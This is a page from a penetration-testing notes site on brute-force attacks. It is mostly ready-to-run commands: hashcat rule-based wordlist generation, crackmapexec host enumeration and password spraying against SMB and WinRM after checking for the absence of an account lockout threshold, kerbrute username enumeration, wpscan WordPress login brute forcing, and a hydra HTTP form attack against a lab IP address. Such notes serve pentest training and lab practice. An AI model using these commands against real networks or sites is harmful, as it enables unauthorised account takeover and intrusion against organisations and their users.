🤯
Hacker Mind
  • Penetration Testing Notes
    • 00 - Kali Linux Preparation
    • Page 1
    • Web Application (80/443)
      • XSS
      • LFI / Path Traversal
      • Wordpress
    • SMB (445)
    • LDAP
    • MSRPC (135)
    • MSSQL
    • Kerberos (88/tcp)
    • DNS (53)
    • IPv6
    • Import Nessus to Metasploit
  • STUCK? Look at this :D
  • Buffer Overflow
    • WinDbg
    • BoF Script Python
  • Active Directory Recon
    • Username Generation
    • PowerView
    • BloodHound
    • Flooding Attack
  • Payload
    • Sendemail
    • Phishing Payload
    • Bypass All The Things
      • AppLocker
      • MSBuild Shell
      • C# Runner
      • Payload Mod
      • Powershell
      • Bypass AV Linux
        • C Runner
  • Exploit
    • Brute Force
    • File Upload
    • Cracking
    • Shell & Stabilization
    • Database
    • MSSQL Injection
  • Tradecraft
    • Invoke-ReflectivePEInjection
  • Metasploit
    • Meterpreter Tricks
  • Privilege Escalation
    • Lateral Movement
    • Linux
    • Windows
  • Post Exploit
    • Active Directory
      • Kerberos
      • ACLs/ACEs
      • DCSync
      • Golden Ticket with krbtgt
      • LAPS
      • Page
      • Impersonate Token
    • Pivoting
      • Pivot in a Case
    • Transfer File
    • Exfiltration
    • Persistence
  • WiFi Pentesting
    • WPA-PSK
    • WPA-E (hostapd)
    • Attack WEP
    • Evil Twin - Wi-Fi
    • WPA3 Downgrade
  • Hardware Hacking
    • Information Gathering
  • Practice & Lab
Powered by GitBook
On this page
  • Generate Wordlist
  • Using Hashcat
  • Active Directory
  • Check workstations
  • Password spraying
  • Kerbrute
  • Wordpress Login
  • Website Login Brute Force
  1. Exploit

Brute Force

Generate Wordlist

Password possibilites:

  • username

  • summer, spring, winter

  • password

  • date(jully, april, 2023, etc)

Using Hashcat

hashcat --force --stdout -r /usr/share/hashcat/rules/best64.rule password.lst

Active Directory

Check workstations

crackmapexec smb 192.168.1.0/24
crackmapexec winrm 192.168.1.0/24


# have a user and password?
# go enumerate computers in the domain
crackmapexec smb $IP -u <username> -p <password> --computers

Password spraying

check the password policy

crackmapexec smb $IP --pass-pol

# check this, if there is info like this go ahead for bruteforce.
Account Lockout Threshold: None

prepare for targets.txt, users.txt and passwords.txt

crackmapexec winrm targets.txt -u users.txt -p passwords.txt --continue-on-success -d <domain>

crackmapexec smb $IP -u users.txt -p '<password>'
crackmapexec winrm $IP -u users.txt -p '<password>'
# --> use evil-winrm to login
# example: evil-winrm -u mhope -p 'testpassword' -i $IP

Kerbrute

kerbrute userenum --dc <dc ip> -d <domain> users.txt
kerbrute userenum --dc <dc ip> -d <domain> /usr/share/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt


# kerbrute with NTLM hash (https://github.com/3gstudent/pyKerbrute)

Wordpress Login

wpscan --url <wordpress url> --wordlist /usr/share/wordlists/rockyou.txt --username <username>

Website Login Brute Force

hydra -l '' -P 3digits.txt -f -v 10.10.171.8 http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000
PreviousExploitNextFile Upload

Last updated 1 year ago